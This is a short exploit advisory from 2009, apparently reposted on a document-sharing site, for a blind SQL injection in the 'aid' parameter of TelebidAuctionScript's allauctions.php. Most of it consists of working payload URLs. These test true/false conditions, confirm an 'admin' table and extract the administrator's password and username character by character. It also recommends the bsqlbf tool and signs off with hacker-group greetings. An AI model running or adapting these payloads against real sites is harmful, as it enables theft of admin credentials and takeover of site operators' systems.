Documents
Resources
Learning Center
Upload
Plans & pricing Sign in
Sign Out
Your Federal Quarterly Tax Payments are due April 15th Get Help Now >>

TelebidAuctionScriptaid Blind SQL Injection Vulnerability

VIEWS: 102 PAGES: 1

									                           TelebidAuctionScriptaid Blind SQL Injection Vulnerability                               Page 1/1
  1    TelebidauctionScript(aid) Blind SQL Injection Vulnerability
  2    ____________________________________
  3
  4    Author : Hussin X
  5
  6    Home : www.IQ−TY.com
  7
  8    email : darkangel_g85@Yahoo.com
  9
  10   ____________________________________
  11
  12   Vendor : http://www.telebidauctionscript.com/
  13
  14   Demo :
  15   _______
  16
  17
  18   http://server/allauctions.php?aid=2+and+1=1 (true)
  19
  20
  21   http://server/allauctions.php?aid=2+and+1=0 (false )
  22
  23
  24   :: Table ::
  25
  26   http://server/allauctions.php?aid=2+and+(SELECT+1+from+admin+limit+0,1)=1
  27
  28
  29   :: column pass and username ::
  30
  31   http://server/allauctions.php?aid=2+and+(SELECT+substring(concat(1,pass),1,1)+from+admin+limit 0,1)=1
  32
  33   http://server/allauctions.php?aid=2 and (SELECT+substring(concat(1,username),1,1) from admin limit 0,1)=1
  34
  35   note : Use the "bsqlbf" to write detailed information
  36
  37   Greetz
  38   WwW.IQ−ty.CoM , Tryag.cc
  39
  40   | CraCkEr | Cyber−Zone | str0ke | jiko




Hussin X                                                                                                           11/17/2009

								
To top